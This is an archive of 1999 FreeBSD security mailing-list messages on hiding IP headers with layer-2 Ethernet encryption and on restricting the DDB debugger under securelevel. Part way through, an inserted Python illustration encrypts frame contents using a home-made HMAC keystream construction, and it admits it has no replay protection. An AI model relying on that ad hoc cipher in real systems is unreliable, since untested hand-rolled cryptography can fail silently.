Cc: Gary Palmer, freebsd-security@FreeBSD.ORG
Subject: Re: Layer 2 ethernet encryption?
In-Reply-To: <37D4AB40.AEE4C2EA@aracnet.com>
References: <39480.936682378@noop.colo.erols.net> <37D4AB40.AEE4C2EA@aracnet.com>

> > > Is it possible to encrypt ethernet packets so that all layers above
> > > layer 2 would be encrypted? The idea I had was to make a device that
> > > could defeat a TCP sniffer by encrypting the IP headers. Is this
> > > doable? Viable? A reinvention of the wheel?

    DEC used to have something called DESNC. I've no idea if it exists or not still, but it does (did) what you want.

-jav

From owner-freebsd-security Mon Sep  6 23:23:30 1999
From: dmp@aracnet.com
Date: Mon, 06 Sep 1999 23:22:36 -0700
Message-ID: <37D4AF2C.A850CEEA@aracnet.com>
To: Javier Henderson
Cc: Gary Palmer, freebsd-security@FreeBSD.ORG
Subject: Re: Layer 2 ethernet encryption?
References: <39480.936682378@noop.colo.erols.net> <37D4AB40.AEE4C2EA@aracnet.com> <14292.44688.380092.659018@bogon.kjsl.com>

Javier Henderson wrote:
>> Is it possible to encrypt ethernet packets so that all layers above
>> layer 2 would be encrypted?
>> The idea I had was to make a device that
>> could defeat a TCP sniffer by encrypting the IP headers. Is this
>> doable? Viable? A reinvention of the wheel?
>
> DEC used to have something called DESNC. I've no idea
> if it exists or not still, but it does (did) what you want.

Do you have the part/model names/numbers by any chance?

From owner-freebsd-security Mon Sep  6 23:25:00 1999
From: Bill Fumerola
Date: Tue, 7 Sep 1999 01:28:16 -0400 (EDT)
To: Nick Hibma
Cc: Matthew Dillon, Greg Black, Dag-Erling Smorgrav, KATO Takenori, bde@zeta.org.au, freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: Init(8) cannot decrease securelevel

On Tue, 7 Sep 1999, Nick Hibma wrote:

> Anyway, as soon as you can physically access the PC, you'd lose anyway,
> independent of whether you can go into DDB to do things. You can reboot,
> boot a floppy. Yes you can do something about those things, but only to
> a limited extent.

Not without someone noticing in a big way. DDB is a silent attack.
--
- bill fumerola - billf@chc-chimes.com - BF1560 - computer horizons corp -
- ph:(800) 252-2421 - bfumerol@computerhorizons.com - billf@FreeBSD.org -

From owner-freebsd-security Mon Sep  6 23:29:02 1999
From: Mike Nowlin
Date: Tue, 7 Sep 1999 02:26:51 -0400 (EDT)
To: dmp@aracnet.com
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Layer 2 ethernet encryption?
In-Reply-To: <37D4AB40.AEE4C2EA@aracnet.com>

> The network in question doesn't use IP-based routing.
>
> > If you are doing this for a local LAN, I suggest you have bigger
> > problems :)
>
> You're right, I do have bigger problems. Like deep paranoia among
> the users of the LAN.

I'm having trouble grasping the idea behind this... Generally speaking, even if you couldn't see the IP src and dst addrs for a packet (as if they were encrypted), you could still see the ethernet addresses, and those are almost as good when it comes to local networks. Anybody with half a clue could figure out which ethernet addresses match up to which machines and their uses.

As far as the paranoia, it sounds like your users know enough to be dangerous, but don't really understand the problem. Marketing people, perhaps?
:)

Assuming someone has physical access to something (the ethernet) that carries traffic they're not supposed to see (like the packets in question), there's little you can do to ensure that somebody can't figure out a way around your security. If that isn't enough, you start looking into managed switches, locked server rooms, and (if all else fails) a new profession.

I'm not against the idea, (actually, it sounds kinda neat), but there's a lot of problems..

mike

From owner-freebsd-security Mon Sep  6 23:41:29 1999
From: dmp@aracnet.com
Date: Mon, 06 Sep 1999 23:39:42 -0700
Message-ID: <37D4B32E.CD58CA8E@aracnet.com>
To: "Rodney W. Grimes"
Cc: Gary Palmer, freebsd-security@FreeBSD.ORG
Subject: Re: Layer 2 ethernet encryption?
References: <199909070542.WAA04637@gndrsh.dnsmgr.net>

"Rodney W. Grimes" wrote:
>
> > dmp@aracnet.com wrote in message ID
> > <37D496A5.A0576E0F@aracnet.com>:
> > > Is it possible to encrypt ethernet packets so that all layers above
> > > layer 2 would be encrypted? The idea I had was to make a device that
> > > could defeat a TCP sniffer by encrypting the IP headers. Is this
> > > doable? Viable? A reinvention of the wheel?
> >
> > How would you route the traffic? No routers would be able to pass the
> > traffic.
> > No, only routers knowing the key would be able to route traffic. In my idea, only the machine to which the packet is being sent would have the decryption key. If the router had the decryption key, it would mean that it would have to be programmable for it to load the right decryption key. That opens a security hole in which a DoS could be executed by corrupting the router's keys. The router's key cache would also have to be retrivable, making it possible to steal the keys from the router. A hardcoded decryption key is the only answer. Not completely secure in and of itself, but to compromise it would require a physical effort, not just an electronic/software one. > > If you are doing this for a local LAN, I suggest you have bigger > > problems :) > > Maybe the LAN is ``wireless'' :-). But more seriously the Wavelan > and several other wireless cards do DES encryption at layer 1... so > it _can_ be done. And more importantly is being done (first hand > knowledge on that one). It's a wired LAN. UTP. Layer 1 encryption wouldn't work unless all devices on the LAN had the same key pair. Great for preventing unauthorized use of the network, but it doesn't do a thing to prevent sniffing by an authorized machine. Unauthorized use of the network isn't an issue, but sniffable traffic is. I like your solution, though. 
From owner-freebsd-security Mon Sep 6 23:54:53 1999
Received: from netserv.osi.ru (netserv.osi.ru [195.178.193.139]) by hub.freebsd.org (Postfix) with ESMTP id 9C7DD14EBB for ; Mon, 6 Sep 1999 23:54:41 -0700 (PDT) (envelope-from ks@itp.ac.ru)
Received: from ntgate.osi.ru (ntgate.osi.ru [195.178.194.141]) by netserv.osi.ru (8.9.1a/8.9.1) with SMTP id KAA09896; Tue, 7 Sep 1999 10:55:10 +0400 (MSK/MSD)
Received: from speecart.osi.ru ([195.178.194.35]) by ntgate.osi.ru (Lotus SMTP MTA v4.6.5 (863.2 5-20-1999)) with SMTP id C32567E5.0025FCB7; Tue, 7 Sep 1999 10:54:55 +0400
X-Mailer: XFMail 1.2 [p0] on FreeBSD
X-Priority: 3 (Normal)
Content-Type: text/plain; charset=KOI8-R
Content-Transfer-Encoding: 8bit
MIME-Version: 1.0
In-Reply-To: <37D4ABCB.E683ABC@aracnet.com>
Date: Tue, 07 Sep 1999 10:56:29 +0400 (MSD)
Reply-To: ks@itp.ac.ru
Organization: OSI AF, Moscow office
From: "Sergey S. Kosyakov"
To: dmp@aracnet.com, freebsd-security@freebsd.org
Subject: Re: Layer 2 ethernet encryption?
Cc: ks@itp.ac.ru

On 07-Sep-99 dmp@aracnet.com wrote:
> "Sergey S. Kosyakov" wrote:
>> On 07-Sep-99 dmp@aracnet.com wrote:
>> > Is it possible to encrypt ethernet packets so that all layers above
>> > layer 2 would be encrypted? The idea I had was to make a device that
>> > could defeat a TCP sniffer by encrypting the IP headers. Is this
>> > doable? Viable? A reinvention of the wheel?
>> >
>>
>> You can establish a secure tunnel with TUND - over tun(4) pseudo-devices if
>> you use routing, or over divert(4) sockets with ipfw(8) rules for LAN.
>
> Both of which require that unencrypted IP headers be used. This
> allows the use of a TCP sniffer to monitor from where and to whom
> traffic is going. By the standards of my group, that's a security
> problem.

Could you please describe your problem in more detail - I mean, what do
you want to do? You want to hide from where and to whom traffic is going
on an Ethernet LAN, isn't it? Then use an Ethernet switching hub.

---
----------------------------------
E-Mail: Sergey S. Kosyakov
Date: 07-Sep-99
Time: 10:51:10
----------------------------------

From owner-freebsd-security Mon Sep 6 23:56:21 1999
Received: from gndrsh.dnsmgr.net (GndRsh.dnsmgr.net [198.145.92.4]) by hub.freebsd.org (Postfix) with ESMTP id E106E14EBB; Mon, 6 Sep 1999 23:56:16 -0700 (PDT) (envelope-from freebsd@gndrsh.dnsmgr.net)
Received: (from freebsd@localhost) by gndrsh.dnsmgr.net (8.9.3/8.9.3) id XAA04873; Mon, 6 Sep 1999 23:56:06 -0700 (PDT) (envelope-from freebsd)
From: "Rodney W. Grimes"
Message-Id: <199909070656.XAA04873@gndrsh.dnsmgr.net>
Subject: Re: Layer 2 ethernet encryption?
In-Reply-To: <37D4B32E.CD58CA8E@aracnet.com> from "dmp@aracnet.com" at "Sep 6, 1999 11:39:42 pm"
To: dmp@aracnet.com
Date: Mon, 6 Sep 1999 23:56:06 -0700 (PDT)
Cc: gpalmer@FreeBSD.ORG (Gary Palmer), freebsd-security@FreeBSD.ORG
X-Mailer: ELM [version 2.4ME+ PL54 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit

[Charset UTF-8 unsupported, skipping...]
[pulled content from save of message...]
> "Rodney W. Grimes" wrote:
> > > dmp@aracnet.com wrote in message ID
> > > <37D496A5.A0576E0F@aracnet.com>:
> > > > Is it possible to encrypt ethernet packets so that all layers above
> > > > layer 2 would be encrypted? The idea I had was to make a device that
> > > > could defeat a TCP sniffer by encrypting the IP headers. Is this
> > > > doable? Viable? A reinvention of the wheel?
> > >
> > > How would you route the traffic? No routers would be able to pass the
> > > traffic.
> >
> > No, only routers knowing the key would be able to route traffic.
>
> In my idea, only the machine to which the packet is being sent would
> have the decryption key. If the router had the decryption key, it
> would mean that it would have to be programmable for it to load the
> right decryption key.

Usually one key per interface, not a big deal, and required for what
I was discussing since this even encrypts the MAC address.

> That opens a security hole in which a DoS
> could be executed by corrupting the router's keys. The router's key
> cache would also have to be retrievable, making it possible to steal
> the keys from the router.

You can't corrupt the router key unless you know the key, it won't
hear you unless your data is properly encrypted. Remember this is
layer 1 encryption, so you have to know the key to encrypt the MAC
to get the router to even listen to you. You can ``physically'' steal
the keys from the router itself, but then we would have to post armed
guards as others mentioned to stop physical access attacks.

>
> A hardcoded decryption key is the only answer. Not completely
> secure in and of itself, but to compromise it would require a
> physical effort, not just an electronic/software one.

See above...

>
> > > If you are doing this for a local LAN, I suggest you have bigger
> > > problems :)
> >
> > Maybe the LAN is ``wireless'' :-). But more seriously the Wavelan
> > and several other wireless cards do DES encryption at layer 1... so
> > it _can_ be done. And more importantly is being done (first hand
> > knowledge on that one).
>
> It's a wired LAN. UTP. Layer 1 encryption wouldn't work unless all
> devices on the LAN had the same key pair. Great for preventing
> unauthorized use of the network, but it doesn't do a thing to prevent
> sniffing by an authorized machine. Unauthorized use of the network
> isn't an issue, but sniffable traffic is.

Hummm... definitely a different problem than we are solving... and
definitely different than the wireless problem we did solve.

> I like your solution, though.
>

--
Rod Grimes - KD7CAX - (RWG25) rgrimes@gndrsh.dnsmgr.net

From owner-freebsd-security Tue Sep 7 0: 2:20 1999
Received: from pik.gammanet.com.pl (pik-gate.gammanet.com.pl [150.254.163.165]) by hub.freebsd.org (Postfix) with ESMTP id CF85A159AA for ; Tue, 7 Sep 1999 00:02:03 -0700 (PDT) (envelope-from Robert@gammanet.pl)
Received: from pc55 ([150.254.192.55]) by pik.gammanet.com.pl (8.9.2/8.9.2) with SMTP id JAA14158 for ; Tue, 7 Sep 1999 09:11:19 +0200 (CEST)
Message-Id: <3.0.5.32.19990907090432.009d69b0@mail.gammanet.pl>
X-Sender: robson@mail.gammanet.pl
X-Mailer: QUALCOMM Windows Eudora Light Version 3.0.5 (32)
Date: Tue, 07 Sep 1999 09:04:32 +0200
To: freebsd-security@freebsd.org
From: Robert Posiadala
Subject: unsubscribe
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"

unsubscribe

From owner-freebsd-security Tue Sep 7 0:20:54 1999
Received: from guppy.pond.net (guppy.pond.net [205.240.25.2]) by hub.freebsd.org (Postfix) with ESMTP id CDC8A14EDF for ; Tue, 7 Sep 1999 00:20:51 -0700 (PDT) (envelope-from dmp@aracnet.com)
Received: from aracnet.com (snapuser2-89.pacificcrest.net [216.36.34.89]) by guppy.pond.net (8.9.3/8.9.3) with ESMTP id AAA28450; Tue, 7 Sep 1999 00:18:13 -0700 (PDT)
From: dmp@aracnet.com
Message-ID: <37D4BCC2.34AFAE9D@aracnet.com>
Date: Tue, 07 Sep 1999 00:20:34 -0700
X-Mailer: Mozilla 4.6 [en] (Win98; U)
X-Accept-Language: en
MIME-Version: 1.0
To: ks@itp.ac.ru
Cc: freebsd-security@freebsd.org
Subject: Re: Layer 2 ethernet encryption?
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

"Sergey S. Kosyakov" wrote:
> On 07-Sep-99 dmp@aracnet.com wrote:
>> "Sergey S. Kosyakov" wrote:
>>> On 07-Sep-99 dmp@aracnet.com wrote:
>>> > Is it possible to encrypt ethernet packets so that all layers above
>>> > layer 2 would be encrypted? The idea I had was to make a device that
>>> > could defeat a TCP sniffer by encrypting the IP headers. Is this
>>> > doable? Viable? A reinvention of the wheel?
>>> >
>>>
>>> You can establish a secure tunnel with TUND - over tun(4) pseudo-devices if
>>> you use routing, or over divert(4) sockets with ipfw(8) rules for LAN.
>>
>> Both of which require that unencrypted IP headers be used. This
>> allows the use of a TCP sniffer to monitor from where and to whom
>> traffic is going. By the standards of my group, that's a security
>> problem.
>
> Could you please describe your problem in more detail - I mean, what do
> you want to do? You want to hide from where and to whom traffic is going
> on an Ethernet LAN, isn't it? Then use an Ethernet switching hub.

I have two problems. The first is that EM emissions on UTP allow one
to monitor all traffic on that cable. The second is that a sniffer run
on an authorized machine will be able to see the source and destination
IP and port of all IP traffic on its segment. I want to fix both
problems. Encrypting everything above layer 2 does this. The only
determinable aspects of the packets would be the source and destination
MAC addresses, relatively sufficient security given the security policy
and topology of the network in question.
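An added illustration of the design described in the message above (everything after the two MAC addresses encrypted under the destination's key, so a sniffer on the segment sees only MACs); this is not code from the thread. The frame layout, the per-destination key table and the stdlib-only cipher construction (HMAC-SHA256 keystream plus encrypt-then-MAC tag, standing in for a proper AEAD such as AES-GCM) are assumptions made for the example.

```python
"""Constructed example: hide EtherType and everything above it, keep MACs visible."""
import hashlib
import hmac
import os
import struct
from typing import Optional

MAC_LEN = 6
CLEAR_LEN = 2 * MAC_LEN   # dst + src MAC stay in the clear; EtherType onward is hidden
NONCE_LEN = 12
TAG_LEN = 16


def _mac(text: str) -> bytes:
    return bytes.fromhex(text.replace(":", ""))


def build_ipv4_tcp_frame(dst_mac, src_mac, src_ip, dst_ip, sport, dport, payload):
    """Constructed cleartext Ethernet II / IPv4 / TCP frame (checksums left zero)."""
    tcp = struct.pack(">HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x18, 65535, 0, 0) + payload
    ip = struct.pack(">BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0,
                     bytes(int(o) for o in src_ip.split(".")),
                     bytes(int(o) for o in dst_ip.split(".")))
    return _mac(dst_mac) + _mac(src_mac) + struct.pack(">H", 0x0800) + ip + tcp


def derive_keys(dest_key: bytes):
    """Split the per-destination key into independent encryption and MAC keys (assumed KDF)."""
    return (hashlib.sha256(b"enc|" + dest_key).digest(),
            hashlib.sha256(b"mac|" + dest_key).digest())


def _keystream(enc_key: bytes, nonce: bytes, length: int) -> bytes:
    # PRF in counter mode: block_i = HMAC(enc_key, nonce || i); nonce must never repeat per key
    out = b""
    counter = 0
    while len(out) < length:
        out += hmac.new(enc_key, nonce + struct.pack(">I", counter), hashlib.sha256).digest()
        counter += 1
    return out[:length]


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _tag(mac_key: bytes, clear: bytes, nonce: bytes, ct: bytes) -> bytes:
    # The visible MAC header is authenticated too, so it cannot be swapped without detection
    return hmac.new(mac_key, clear + nonce + ct, hashlib.sha256).digest()[:TAG_LEN]


def encrypt_frame(frame: bytes, dest_key: bytes, nonce: Optional[bytes] = None) -> bytes:
    """Assumed wire format: dst MAC | src MAC | nonce | ciphertext | tag."""
    clear, body = frame[:CLEAR_LEN], frame[CLEAR_LEN:]
    nonce = os.urandom(NONCE_LEN) if nonce is None else nonce
    enc_key, mac_key = derive_keys(dest_key)
    ct = _xor(body, _keystream(enc_key, nonce, len(body)))
    return clear + nonce + ct + _tag(mac_key, clear, nonce, ct)


def decrypt_frame(wire: bytes, dest_key: bytes) -> Optional[bytes]:
    """Return the original frame, or None when the tag fails (wrong key or tampering)."""
    if len(wire) < CLEAR_LEN + NONCE_LEN + TAG_LEN:
        return None
    clear = wire[:CLEAR_LEN]
    nonce = wire[CLEAR_LEN:CLEAR_LEN + NONCE_LEN]
    ct, tag = wire[CLEAR_LEN + NONCE_LEN:-TAG_LEN], wire[-TAG_LEN:]
    enc_key, mac_key = derive_keys(dest_key)
    if not hmac.compare_digest(tag, _tag(mac_key, clear, nonce, ct)):
        return None
    return clear + _xor(ct, _keystream(enc_key, nonce, len(ct)))


def sniffer_view(wire: bytes) -> dict:
    """What a passive sniffer gets by parsing the bytes as an ordinary Ethernet frame."""
    view = {"dst_mac": wire[:6].hex(":"), "src_mac": wire[6:12].hex(":"),
            "ethertype": struct.unpack(">H", wire[12:14])[0],
            "length": len(wire), "ip": None}   # frame length and timing still leak
    if view["ethertype"] == 0x0800 and len(wire) >= 34:
        ip = wire[14:34]
        ihl = (ip[0] & 0x0F) * 4
        view["ip"] = {"src": ".".join(str(b) for b in ip[12:16]),
                      "dst": ".".join(str(b) for b in ip[16:20]), "proto": ip[9]}
        if ip[9] in (6, 17) and len(wire) >= 14 + ihl + 4:
            view["ip"]["ports"] = struct.unpack(">HH", wire[14 + ihl:14 + ihl + 4])
    return view


if __name__ == "__main__":
    KEYS = {"02:00:00:00:00:02": b"\x11" * 32}   # constructed per-destination key table
    frame = build_ipv4_tcp_frame("02:00:00:00:00:02", "02:00:00:00:00:01",
                                 "10.0.0.1", "10.0.0.2", 40000, 22, b"hello")
    wire = encrypt_frame(frame, KEYS["02:00:00:00:00:02"])
    print("clear :", sniffer_view(frame))    # IPs and ports recoverable
    print("cipher:", sniffer_view(wire))     # only the two MACs and the length
    print("roundtrip ok:", decrypt_frame(wire, KEYS["02:00:00:00:00:02"]) == frame)
```

Note that a real design would also need replay protection and key distribution, which the thread leaves to the hardware (ROM-swapped keys); the example shows only the confidentiality and integrity split between the visible and hidden parts of the frame.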
From owner-freebsd-security Tue Sep 7 0:20:54 1999
Received: from rip.psg.com (rip.psg.com [147.28.0.39]) by hub.freebsd.org (Postfix) with ESMTP id 0B0D315175 for ; Tue, 7 Sep 1999 00:20:52 -0700 (PDT) (envelope-from randy@psg.com)
Received: from localhost (808 bytes) by rip.psg.com via sendmail with P:stdio/R:inet_resolve/T:smtp (sender: ) (ident using unix) id for ; Tue, 7 Sep 1999 00:20:51 -0700 (PDT) (Smail-3.2.0.101 1997-Dec-17 #1 built 1999-Apr-1)
Date: Tue, 7 Sep 1999 00:20:51 -0700 (PDT)
From: Randy Bush
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
To: Bruce Evans
Cc: freebsd-security@freebsd.org
Subject: Re: Init(8) cannot decrease securelevel

> date: 1997/06/25 07:31:47; author: joerg; state: Exp; lines: +2 -2
> Don't ever allow lowering the securelevel at all. Allowing it does
> nothing good except for opening a can of (potential or real) security
> holes. People maintaining a machine with higher security requirements
> need to be on the console anyway, so there's no point in not forcing
> them to reboot before starting maintenance.

the only time this is annoying to me is that i have to reboot before doing
a buildworld.

randy

From owner-freebsd-security Tue Sep 7 1:20: 1 1999
Received: from guppy.pond.net (guppy.pond.net [205.240.25.2]) by hub.freebsd.org (Postfix) with ESMTP id C209A15572 for ; Tue, 7 Sep 1999 01:19:57 -0700 (PDT) (envelope-from dmp@aracnet.com)
Received: from aracnet.com (snapuser2-89.pacificcrest.net [216.36.34.89]) by guppy.pond.net (8.9.3/8.9.3) with ESMTP id BAA02189; Tue, 7 Sep 1999 01:15:18 -0700 (PDT)
From: dmp@aracnet.com
Message-ID: <37D4CA23.6A64FCAC@aracnet.com>
Date: Tue, 07 Sep 1999 01:17:39 -0700
X-Mailer: Mozilla 4.6 [en] (Win98; U)
X-Accept-Language: en
MIME-Version: 1.0
To: Mike Nowlin
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Layer 2 ethernet encryption?
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 7bit

Mike Nowlin wrote:
> > The network in question doesn't use IP-based routing.
> >
> > > If you are doing this for a local LAN, I suggest you have bigger
> > > problems :)
> >
> > You're right, I do have bigger problems. Like deep paranoia among
> > the users of the LAN.
>
> I'm having trouble grasping the idea behind this... Generally speaking,
> even if you couldn't see the IP src and dst addrs for a packet (as if they
> were encrypted), you could still see the ethernet addresses, and those are
> almost as good when it comes to local networks. Anybody with half a clue
> could figure out which ethernet addresses match up to which machines and
> their uses.

True, you can determine which hardware devices are sending and
receiving the traffic, but with layer 3 encrypted, that's all you can
see. You wouldn't be able to determine which IP or port the packet is
coming from or going to, not even if it's IP traffic or not.

> As far as the paranoia, it sounds like your users know enough to be
> dangerous, but don't really understand the problem. Marketing people,
> perhaps? :)

We got rid of the marketing people last year when we determined that
the ability for our organization to pander to the general public was a
security risk. :)

> Assuming someone has physical access to something (the ethernet) that
> carries traffic they're not supposed to see (like the packets in
> question), there's little you can do to ensure that somebody can't figure
> out a way around your security. If that isn't enough, you start looking
> into managed switches, locked server rooms, and (if all else fails) a new
> profession.

In order: A machine on the network can't see any other machine other
than its firewall interface until the DC authorizes its presence.
Managed switches aren't used, we haven't found one that can provide a
high enough level of security. The server rooms already are locked. A
new profession? I hope you're kidding. :-)

From owner-freebsd-security Tue Sep 7 1:27:17 1999
Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id F0C0615579; Tue, 7 Sep 1999 01:27:11 -0700 (PDT) (envelope-from des@flood.ping.uio.no)
Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id KAA27848; Tue, 7 Sep 1999 10:26:18 +0200 (CEST) (envelope-from des)
To: Matthew Dillon
Cc: "Matthew D. Fuller", Dag-Erling Smorgrav, KATO Takenori, bde@zeta.org.au, freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: Init(8) cannot decrease securelevel
References: <199909060513.PAA12402@godzilla.zeta.org.au> <19990906142342F.kato@gneiss.eps.nagoya-u.ac.jp> <199909061539.IAA74893@apollo.backplane.com> <19990906141231.L18814@futuresouth.com> <199909062029.NAA76229@apollo.backplane.com>
From: Dag-Erling Smorgrav
Date: 07 Sep 1999 10:26:18 +0200
In-Reply-To: Matthew Dillon's message of "Mon, 6 Sep 1999 13:29:44 -0700 (PDT)"
Lines: 14
X-Mailer: Gnus v5.5/Emacs 19.34

Matthew Dillon writes:
> So making DDB 'secure-level friendly' would be a useful thing
> to do, I think. The idea is not to disable DDB, but to simply
> limit the actions that can be performed within it if the securelevel
> has been raised. The sysadmin would only be allowed to issue
> passive commands, cont, and 'panic'. The sysadmin would not be
> allowed to modify the running system.

That's an excellent idea - it shouldn't be too hard to add a kernel
option (say, DDB_RESTRICTED) and #ifndef the "dangerous" commands.

DES (must... write... patches...)
--
Dag-Erling Smorgrav - des@flood.ping.uio.no

From owner-freebsd-security Tue Sep 7 1:34: 8 1999
Received: from guppy.pond.net (guppy.pond.net [205.240.25.2]) by hub.freebsd.org (Postfix) with ESMTP id C07A0155D3 for ; Tue, 7 Sep 1999 01:34:04 -0700 (PDT) (envelope-from dmp@aracnet.com)
Received: from aracnet.com (snapuser2-89.pacificcrest.net [216.36.34.89]) by guppy.pond.net (8.9.3/8.9.3) with ESMTP id BAA03156; Tue, 7 Sep 1999 01:31:16 -0700 (PDT)
From: dmp@aracnet.com
Message-ID: <37D4CDE1.8FF6DA73@aracnet.com>
Date: Tue, 07 Sep 1999 01:33:37 -0700
X-Mailer: Mozilla 4.6 [en] (Win98; U)
X-Accept-Language: en
MIME-Version: 1.0
To: Christian Kuhtz
Cc: "Bryan Smith (Administrator)", freebsd-security@FreeBSD.ORG
Subject: Re: Layer 2 ethernet encryption?
References: <37D496A5.A0576E0F@aracnet.com> <19990907010827.A124@ns1.adsu.bellsouth.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Christian Kuhtz wrote:
>
> Err, there are some things that don't run easily over SSH.
>
> You could approach this at least four ways (that I can think of):
>
> a) write a device driver layer which inserts link layer encryption and
>    crypto management functions. - you'd need to do this with each box
>    and device driver you want to be able to communicate with each
>    other -- very cumbersome, IMHO, and a bad idea unless you got a
>    damn good reason to do so.
>
> b) use IPv4 IPSec -- pain in the a** after all the junk we had to deal
>    with in my professional life. Lots and lots of interop issues.
>
> c) use IPv6 IPSec -- learning curve to properly run IPv6 may be a bit
>    high, but the rest is pretty straightforward and IMHO more clean
>    than IPv4 IPSec, particularly IPSec host-mode.
>
> d) use SSL style application layer encryption. -- by far the most
>    portable implementation.

All of these are software-based security measures. In other words,
they aren't very good.

> It'd help if you could describe a little more of what exactly you're trying
> to do..

What it comes down to is a hardware-based means of encrypting ethernet
traffic in a way that allows only the MAC address to be seen. I won't
go into much detail about the network in question. I will say that an
unencrypted MAC address is required, and that only the source and
destination computers need know the unencrypted contents of layers 3
and higher.

> Ask yourself who you mistrust and who you trust in your application. That's
> usually the best way to approach encryption, unless you are a marketing
> moron^H^H^H^H^Hgenius.

I mistrust everyone in general. I grant trust to those I must deal
with, in order to deal with them. When I'm not dealing with someone, I
do not trust them.

From owner-freebsd-security Tue Sep 7 2: 9: 0 1999
Received: from guppy.pond.net (guppy.pond.net [205.240.25.2]) by hub.freebsd.org (Postfix) with ESMTP id F009A15A92; Tue, 7 Sep 1999 02:08:42 -0700 (PDT) (envelope-from dmp@aracnet.com)
Received: from aracnet.com (snapuser2-89.pacificcrest.net [216.36.34.89]) by guppy.pond.net (8.9.3/8.9.3) with ESMTP id CAA05236; Tue, 7 Sep 1999 02:06:06 -0700 (PDT)
From: dmp@aracnet.com
Message-ID: <37D4D60C.8AF45A7B@aracnet.com>
Date: Tue, 07 Sep 1999 02:08:28 -0700
X-Mailer: Mozilla 4.6 [en] (Win98; U)
X-Accept-Language: en
MIME-Version: 1.0
To: "Rodney W. Grimes"
Cc: Gary Palmer, freebsd-security@FreeBSD.ORG
Subject: Re: Layer 2 ethernet encryption?
References: <199909070656.XAA04873@gndrsh.dnsmgr.net>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

"Rodney W. Grimes" wrote:
>
> "Rodney W. Grimes" wrote:
> > > > dmp@aracnet.com wrote in message ID
> > > > <37D496A5.A0576E0F@aracnet.com>:
> > > > > Is it possible to encrypt ethernet packets so that all layers above
> > > > > layer 2 would be encrypted? The idea I had was to make a device that
> > > > > could defeat a TCP sniffer by encrypting the IP headers. Is this
> > > > > doable? Viable? A reinvention of the wheel?
> > > >
> > > > How would you route the traffic? No routers would be able to pass the
> > > > traffic.
> > >
> > > No, only routers knowing the key would be able to route traffic.
> >
> > In my idea, only the machine to which the packet is being sent would
> > have the decryption key. If the router had the decryption key, it
> > would mean that it would have to be programmable for it to load the
> > right decryption key.
>
> Usually one key per interface, not a big deal, and required for what
> I was discussing since this even encrypts the MAC address.

However, that means that every device on the network must have a key.
For devices like routers and switches, which don't provide absolute
control over security, allowing them to de/encrypt traffic is a
security hole. With only the workstations and servers having keys and
running open-source software, there are fewer security holes, plus a
far greater level of control can be exercised.

> > That opens a security hole in which a DoS
> > could be executed by corrupting the router's keys. The router's key
> > cache would also have to be retrievable, making it possible to steal
> > the keys from the router.
>
> You can't corrupt the router key unless you know the key, it won't
> hear you unless your data is properly encrypted. Remember this is
> layer 1 encryption, so you have to know the key to encrypt the MAC
> to get the router to even listen to you.

With that method, the packet has to be decrypted, analysed, then
reencrypted at each hop, making each hop a security risk. By having
the source encrypt the packet to the destination's key, leaving layer
2 intact, the packet can remain encrypted for the entire trip, with
only the source and destination knowing the real nature of the data
being sent.

> You can ``physically'' steal the keys from the router itself,
> but then we would have to post armed guards as others mentioned to
> stop physical access attacks.

Well, they aren't armed, at least not with guns. Not the ones inside
the building, any way. A lot of computer equipment doesn't react well
to bullets. :-)

From owner-freebsd-security Tue Sep 7 2:40:33 1999
Received: from eclogite.eps.nagoya-u.ac.jp (eclogite.eps.nagoya-u.ac.jp [133.6.124.145]) by hub.freebsd.org (Postfix) with ESMTP id E83A915546; Tue, 7 Sep 1999 02:40:23 -0700 (PDT) (envelope-from kato@ganko.eps.nagoya-u.ac.jp)
Received: from localhost (gneiss.eps.nagoya-u.ac.jp [133.6.124.148]) by eclogite.eps.nagoya-u.ac.jp (8.9.3/3.7W) with ESMTP id SAA04514; Tue, 7 Sep 1999 18:36:38 +0900 (JST)
To: des@flood.ping.uio.no
Cc: dillon@apollo.backplane.com, fullermd@futuresouth.com, kato@ganko.eps.nagoya-u.ac.jp, bde@zeta.org.au, freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: Init(8) cannot decrease securelevel
From: KATO Takenori
In-Reply-To: Your message of "07 Sep 1999 10:26:18 +0200"
X-Mailer: Mew version 1.93 on Emacs 19.34 / Mule 2.3 (SUETSUMUHANA)
X-PGP-Fingerprint: 03 72 85 36 62 46 23 03 52 B1 10 22 44 10 0D 9E
Mime-Version: 1.0
Content-Type: Text/Plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <19990907183608S.kato@gneiss.eps.nagoya-u.ac.jp>
Date: Tue, 07 Sep 1999 18:36:08 +0900
X-Dispatcher: imput version 980905(IM100)
Lines: 19

Dag-Erling Smorgrav wrote:
> That's an excellent idea - it shouldn't be too hard to add a kernel
> option (say, DDB_RESTRICTED) and #ifndef the "dangerous" commands.

To achieve both higher security and kernel hackers' convenience, I'd
submit the following idea:

- If securelevel > 1, DDB is in restricted mode.
- If securelevel > 1 and an option is defined, DDB is in powerful mode.
- If securelevel < 1, DDB is in powerful mode.

-----------------------------------------------+--------------------------+
KATO Takenori                                  | FreeBSD                  |
Dept. Earth Planet. Sci, Nagoya Univ.          | The power to serve!      |
Nagoya, 464-8602, Japan                        | http://www.FreeBSD.org/  |
++++ FreeBSD(98) 3.2: Rev. 01 available!       |http://www.jp.FreeBSD.org/|
